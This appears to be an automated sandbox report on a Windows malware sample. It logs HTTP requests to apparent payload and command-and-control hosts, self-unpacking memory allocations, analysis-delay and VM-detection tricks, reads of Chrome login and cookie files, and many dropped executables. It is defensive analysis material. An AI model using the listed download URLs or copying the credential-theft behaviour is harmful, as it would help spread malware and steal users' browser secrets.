__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (19 events)

suspicious_features	HTTP version 1.0 used	suspicious_request	HEAD http://b92d17fa-9c17-4007-a5f7-b87033b86cc2.s3.us-east-2.amazonaws.com/BBSbacket.exe
suspicious_features	HTTP version 1.0 used	suspicious_request	GET http://b92d17fa-9c17-4007-a5f7-b87033b86cc2.s3.us-east-2.amazonaws.com/BBSbacket.exe
suspicious_features	POST method with no referer header	suspicious_request	POST http://iw.gamegame.info/report7.4.php
suspicious_features	POST method with no referer header	suspicious_request	POST http://ol.gamegame.info/report7.4.php
suspicious_features	GET method with no useragent header	suspicious_request	GET http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/Widgets/Picture-Lab.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://limesfile.com/Ea42LhC7KVL6GEpzgxwW/C_Net_8Rpjkd5GEqRYJq87/xYW2RW5ePv.exe
suspicious_features	POST method with no referer header	suspicious_request	POST http://uyg5wye.2ihsfa.com/api/?sid=214117&key=0f51bef1ab2ad0b2ca0fa6f125359da2
suspicious_features	GET method with no useragent header	suspicious_request	GET http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/Widgets/i-record.exe
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://87.251.71.193//
suspicious_features	GET method with no useragent header	suspicious_request	GET http://limesfile.com/Ea42LhC7KVL6GEpzgxwW/C_Net_8Rpjkd5GEqRYJq87/f3kmkuwbdpgytdc5.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://limesfile.com/Ea42LhC7KVL6GEpzgxwW/C_Net_8Rpjkd5GEqRYJq87/xuqczuydmga4p4c.exe
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://reportyuwt4sbackv97qarke3.com/sCTMqVJusfff2DEP/eYzrrbN8esV7bvgC
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.google.com/
suspicious_features	GET method with no useragent header	suspicious_request	GET https://c.pycharm3.ru/SystemServiceModelConfigurationExtensionsSection61947
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://connectini.net/Series/SuperNitou.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://api.ip.sb/geoip
suspicious_features	GET method with no useragent header	suspicious_request	GET https://iplogger.org/1Hpxd7
suspicious_features	GET method with no useragent header	suspicious_request	GET https://news-systems.xyz/?user=barret1
suspicious_features	GET method with no useragent header	suspicious_request	GET https://news-systems.xyz/?user=barret2

Performs some HTTP requests (32 events)

request	GET http://ip-api.com/json/
request	HEAD http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/C_Blazer_Sha/PicturesLab.exe
request	GET http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/C_Blazer_Sha/PicturesLab.exe
request	GET http://ipinfo.io/country
request	HEAD http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/C_Blazer_Sha/I-Record.exe
request	GET http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/C_Blazer_Sha/I-Record.exe
request	GET http://ipinfo.io/ip
request	HEAD http://b92d17fa-9c17-4007-a5f7-b87033b86cc2.s3.us-east-2.amazonaws.com/BBSbacket.exe
request	GET http://b92d17fa-9c17-4007-a5f7-b87033b86cc2.s3.us-east-2.amazonaws.com/BBSbacket.exe
request	GET http://ip-api.com/json/?fields=8198
request	POST http://iw.gamegame.info/report7.4.php
request	POST http://ol.gamegame.info/report7.4.php
request	GET http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/Widgets/Picture-Lab.exe
request	GET http://uyg5wye.2ihsfa.com/api/fbtime
request	GET http://limesfile.com/Ea42LhC7KVL6GEpzgxwW/C_Net_8Rpjkd5GEqRYJq87/xYW2RW5ePv.exe
request	POST http://uyg5wye.2ihsfa.com/api/?sid=214117&key=0f51bef1ab2ad0b2ca0fa6f125359da2
request	GET http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/Widgets/i-record.exe
request	POST http://87.251.71.193//
request	GET http://limesfile.com/Ea42LhC7KVL6GEpzgxwW/C_Net_8Rpjkd5GEqRYJq87/f3kmkuwbdpgytdc5.exe
request	GET http://limesfile.com/Ea42LhC7KVL6GEpzgxwW/C_Net_8Rpjkd5GEqRYJq87/xuqczuydmga4p4c.exe
request	POST http://reportyuwt4sbackv97qarke3.com/sCTMqVJusfff2DEP/eYzrrbN8esV7bvgC
request	GET http://www.google.com/
request	GET https://ipinfo.io/country
request	GET https://www.facebook.com/
request	GET https://ipqualityscore.com/api/json/ip/gp65l99h87k3l1g0owh8fr8v99dme/175.208.134.150
request	GET https://c.pycharm3.ru/SystemServiceModelConfigurationExtensionsSection61947
request	POST https://connectini.net/Series/SuperNitou.php
request	GET https://iplogger.org/18hh57
request	GET https://api.ip.sb/geoip
request	GET https://iplogger.org/1Hpxd7
request	GET https://news-systems.xyz/?user=barret1
request	GET https://news-systems.xyz/?user=barret2

Sends data using the HTTP POST Method (6 events)

request	POST http://iw.gamegame.info/report7.4.php
request	POST http://ol.gamegame.info/report7.4.php
request	POST http://uyg5wye.2ihsfa.com/api/?sid=214117&key=0f51bef1ab2ad0b2ca0fa6f125359da2
request	POST http://87.251.71.193//
request	POST http://reportyuwt4sbackv97qarke3.com/sCTMqVJusfff2DEP/eYzrrbN8esV7bvgC
request	POST https://connectini.net/Series/SuperNitou.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 861 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 23, 2021, 10:27 a.m.	process_identifier: 3324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:27 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 397312 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0065d000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 917504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000710000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2371000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2a0b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 2555904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000020b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000022a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2374000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2374000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2374000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2374000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92bfa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c0c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92cac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92cd6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92cb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92bfb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d25000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d26000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d27000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d28000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d29000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d2a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c0d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 23, 2021, 10:20 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d2d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

A process attempted to delay the analysis task. (1 event)

description

BarSetpFile.exe tried to sleep 521 seconds, actually delayed analysis time by 521 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (3 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW May 23, 2021, 10:20 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13276880896 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 23, 2021, 10:21 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13265473536 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 23, 2021, 10:22 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13244301312 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1

Steals private information from local Internet browsers (5 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal

Looks up the external IP address (2 events)

domain	ipinfo.io
domain	ip-api.com

Creates executable files on the filesystem (36 events)

file	C:\Program Files (x86)\Data Finder\Versium Research\Uninstall.exe
file	C:\Users\Public\Desktop\Picture Lab.lnk
file	C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
file	C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe
file	C:\Users\test22\AppData\Local\Temp\is-TNG2H.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-5R3UN.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-LVB8H.tmp\idp.dll
file	C:\Program Files (x86)\Picture Lab\Guleqishaedi.exe
file	C:\Program Files\Internet Explorer\UYTTXGEVIT\irecord.exe
file	C:\Users\test22\AppData\Local\Temp\is-LVB8H.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-9E85G.tmp\4_177039.exe
file	C:\Program Files (x86)\Data Finder\Versium Research\BarSetpFile.exe
file	C:\Users\test22\AppData\Local\Temp\is-TNG2H.tmp\itdownload.dll
file	C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\recording.lnk
file	C:\Users\test22\AppData\Local\Temp\35-ee468-37b-64bb7-869fa1b301d69\Naesurygoqa.exe
file	C:\Users\test22\AppData\Roaming\5931879.exe
file	C:\Users\test22\AppData\Local\Temp\is-LVB8H.tmp\3316505.exe
file	C:\Program Files (x86)\Data Finder\Versium Research\Versium.exe
file	C:\Users\test22\AppData\Local\Temp\89-c69b5-0b0-9d9b4-f8e2a18de3e26\Syruzhulyso.exe
file	C:\Users\test22\AppData\Local\Temp\is-TNG2H.tmp\Setup.exe
file	C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
file	C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Picture Lab.lnk
file	C:\Users\test22\AppData\Local\Temp\is-9E85G.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\install.dll
file	C:\Users\test22\AppData\Local\Temp\53-2a4df-783-e8e83-ece411c6b8600\Soricurijae.exe
file	C:\Users\Public\Desktop\recording.lnk
file	C:\Users\test22\AppData\Local\Temp\is-9E85G.tmp\idp.dll
file	C:\Users\test22\AppData\Local\Temp\is-9CNC8.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\install.dll.lnk
file	C:\Users\test22\AppData\Local\Temp\c9-6d08d-f12-2f1a2-8c3ee8b034afe\Nehaetaepiwae.exe
file	C:\Users\test22\AppData\Local\Temp\adobe_caps.dll
file	C:\Users\test22\AppData\Local\Temp\jfiag3g_gg.exe
file	C:\Program Files (x86)\Reference Assemblies\Tyshineqashe.exe
file	C:\Program Files\Microsoft Office\VPAXNZKLLZ\prolab.exe

Creates a shortcut to an executable file (14 events)

file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk
file	C:\Users\Public\Desktop\recording.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk
file	C:\Users\Public\Desktop\Picture Lab.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\recording.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk
file	C:\Users\test22\AppData\Local\Temp\install.dll.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Picture Lab.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk

Drops a binary and executes it (14 events)

file	C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
file	C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
file	C:\Program Files (x86)\Data Finder\Versium Research\BarSetpFile.exe
file	C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
file	C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe
file	C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe
file	C:\Program Files (x86)\Data Finder\Versium Research\Versium.exe
file	C:\Users\test22\AppData\Roaming\5931879.exe
file	C:\Users\test22\AppData\Local\Temp\install.dll.lnk
file	C:\Users\test22\AppData\Local\Temp\is-TNG2H.tmp\Setup.exe
file	C:\Program Files\Microsoft Office\VPAXNZKLLZ\prolab.exe
file	C:\Users\test22\AppData\Local\Temp\c9-6d08d-f12-2f1a2-8c3ee8b034afe\Nehaetaepiwae.exe
file	C:\Program Files\Internet Explorer\UYTTXGEVIT\irecord.exe
file	C:\Users\test22\AppData\Local\Temp\35-ee468-37b-64bb7-869fa1b301d69\Naesurygoqa.exe

Drops an executable to the user AppData folder (16 events)

file	C:\Users\test22\AppData\Local\Temp\adobe_caps.dll
file	C:\Users\test22\AppData\Local\Temp\jfiag3g_gg.exe
